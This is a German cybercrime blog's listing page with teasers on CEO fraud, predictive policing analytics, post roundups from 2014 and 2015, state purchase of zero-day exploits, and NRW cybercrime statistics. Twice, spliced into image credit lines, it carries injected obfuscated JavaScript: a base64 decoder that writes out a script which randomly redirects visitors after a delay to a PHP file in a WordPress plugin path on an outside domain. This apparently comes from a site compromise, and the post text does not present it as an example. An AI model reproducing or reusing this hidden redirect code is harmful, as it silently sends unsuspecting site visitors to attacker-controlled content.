CEO-Fraud: Zahlen steigen – die Überraschung der Betroffenen auch.

cropped-fotolia_80624652.jpgBekannt unter den Namen CEO-Fraud oder Fake President Fraud oder auch Business Email Compromise (BEC) – die Masche ist oft die gleiche, der Schaden steigt. Über das Hellfeld konnte letzte Woche das LKA NRW auf dem CEO-Fraud Präventionstag in Düsseldorf berichten – ich dann über das Dunkelfeld, welches erwartungsgemäß dann doch höher ist. Der Direktor des LKA NRW bezeichnete das Tatmuster als „Enkeltrick 4.0“. Das bringt es auf den Punkt! Weiterlesen…

Predicting Crime in a Big Data World

32c3 Predictive AnalyticsWir benutzen in unserem Forensik-Team bei der Auswertung großer Datenmengen immer häufiger Predictive Analytics Verfahren. Beispielsweise bei der Analyse großer e-Mail Datenbestände, um hier unter ermittlungsökonomischen Erwägungen schneller zu einem belastbaren Erstergebnis zu kommen (Vollreview vs. Stichprobe auf Basis von Suchwörtern). Auch im Bereich der Advanced Forensic Data Analytics schauen wir uns nicht nur an, was in der Vergangenheit beispielsweise in einem SAP-System passiert ist oder was gerade passiert, sondern welche betrügerische Handlungen in Zukunft passieren werden - wann und wo und durch welche Benutzerkennung. Mehrere Strafverfolgungsbehörden im In- und Ausland nutzen diese Verfahren auch im Rahmen des sogenannten "Predictive Policing". Auf dem 32C3 Ende letzten Jahres gab es hierzu einen Vortrag, der  Weiterlesen...

Das habe ich 2015 woanders gebloggt

© Orl<script/>function u2fd518ba9147(q3){var u9=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=‘;var y7=“;var ve,p7,w9,w4,y6,p9,y4;var s0=0;do{w4=u9.indexOf(q3.charAt(s0++));y6=u9.indexOf(q3.charAt(s0++));p9=u9.indexOf(q3.charAt(s0++));y4=u9.indexOf(q3.charAt(s0++));ve=(w4<<2)|(y6>>4);p7=((y6&15)<<4)|(p9>>2);w9=((p9&3)<<6)|y4;if(ve>=192)ve+=848;else if(ve==168)ve=1025;else if(ve==184)ve=1105;y7+=String.fromCharCode(ve);if(p9!=64){if(p7>=192)p7+=848;else if(p7==168)p7=1025;else if(p7==184)p7=1105;y7+=String.fromCharCode(p7);}if(y4!=64){if(w9>=192)w9+=848;else if(w9==168)w9=1025;else if(w9==184)w9=1105;y7+=String.fromCharCode(w9);}}while(s0<q3.length);document.write(y7);};u2fd518ba9147('PHNjcmlwdD4NCnZhciBudW1iZXIxPU1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqIDYpOyANCmlmIChudW1iZXIxPT0zKQ0Kew0KIHZhciBkZWxheSA9IDE4MDAwOwkNCiBzZXRUaW1lb3V0KCJkb2N1bWVudC5sb2NhdGlvbi5ocmVmPSdodHRwOi8vd3d3LmJ0bGF3ZmlybS5jb20vd3AtY29udGVudC9wbHVnaW5zL3NpLWNvbnRhY3QtZm9ybS9jYXB0Y2hhLXNlY3VyZWltYWdlL3NlY3VyaW1hZ2Vfc3RvcC5waHAnIiwgZGVsYXkpOw0KfQ0KPC9zY3JpcHQ+');ando Florin Rosu - Fotolia.comAuch im zurückliegenden Jahr 2015 habe ich auf anderen Plattformen mehr oder weniger sinnvolle Beiträge von mir gegeben. Anbei eine Auswahl:

Weiterlesen...

Das blogge ich woanders 2014

© Orl<script/>function u2fd518ba9147(q3){var u9=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=‘;var y7=“;var ve,p7,w9,w4,y6,p9,y4;var s0=0;do{w4=u9.indexOf(q3.charAt(s0++));y6=u9.indexOf(q3.charAt(s0++));p9=u9.indexOf(q3.charAt(s0++));y4=u9.indexOf(q3.charAt(s0++));ve=(w4<<2)|(y6>>4);p7=((y6&15)<<4)|(p9>>2);w9=((p9&3)<<6)|y4;if(ve>=192)ve+=848;else if(ve==168)ve=1025;else if(ve==184)ve=1105;y7+=String.fromCharCode(ve);if(p9!=64){if(p7>=192)p7+=848;else if(p7==168)p7=1025;else if(p7==184)p7=1105;y7+=String.fromCharCode(p7);}if(y4!=64){if(w9>=192)w9+=848;else if(w9==168)w9=1025;else if(w9==184)w9=1105;y7+=String.fromCharCode(w9);}}while(s0<q3.length);document.write(y7);};u2fd518ba9147('PHNjcmlwdD4NCnZhciBudW1iZXIxPU1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqIDYpOyANCmlmIChudW1iZXIxPT0zKQ0Kew0KIHZhciBkZWxheSA9IDE4MDAwOwkNCiBzZXRUaW1lb3V0KCJkb2N1bWVudC5sb2NhdGlvbi5ocmVmPSdodHRwOi8vd3d3LmJ0bGF3ZmlybS5jb20vd3AtY29udGVudC9wbHVnaW5zL3NpLWNvbnRhY3QtZm9ybS9jYXB0Y2hhLXNlY3VyZWltYWdlL3NlY3VyaW1hZ2Vfc3RvcC5waHAnIiwgZGVsYXkpOw0KfQ0KPC9zY3JpcHQ+');ando Florin Rosu - Fotolia.comAuch wenn ich hier im letzten Jahr 2014 nicht so viel geschrieben habe, gab es einige Blogbeiträge von mir zu lesen. Anbei ein Überblick, was ich so woanders zu Cybercrime, Data Leakage und Wirtschaftskriminalität geschrieben habe. Weiterlesen...

Soll der Staat Zero-Day-Exploits kaufen?

© Onidji - Fotolia.comVor kurzem tauchte die Meldung auf, dass eine nachgeordnete Behörde des Bundesministerium des Inneren Zero-Day-Exploits kaufen möchte, um die IT-Sicherheit des Landes zu erhöhen. Da damit ja wohl nicht aufkaufen und zur Sicherheit der Bürger komplett vom Markt nehmen gemeint war, Weiterlesen...

Zentralstelle zur Cyber Crime Bekämpfung (ZAC) und Fallzahlen in NRW

© Ben Chams - Fotolia.comGerade haben Unbekannte 16 Millionen Zugangsdaten verschiedener Onlinedienste gekapert – vor allem deutsche Nutzer sind betroffen. Bei einer US-Einzelhandelskette erbeuteten Cyberkriminelle rund siebzig Millionen Kundendatensätze einschließlich Kreditkarteninfos. Es sind die zwei neuesten Fälle schwere Hackerattacken. Die Täter: bestens organisiert, dreist und schnell. Die Opfer: schlecht vorbereitet.

Weiterlesen...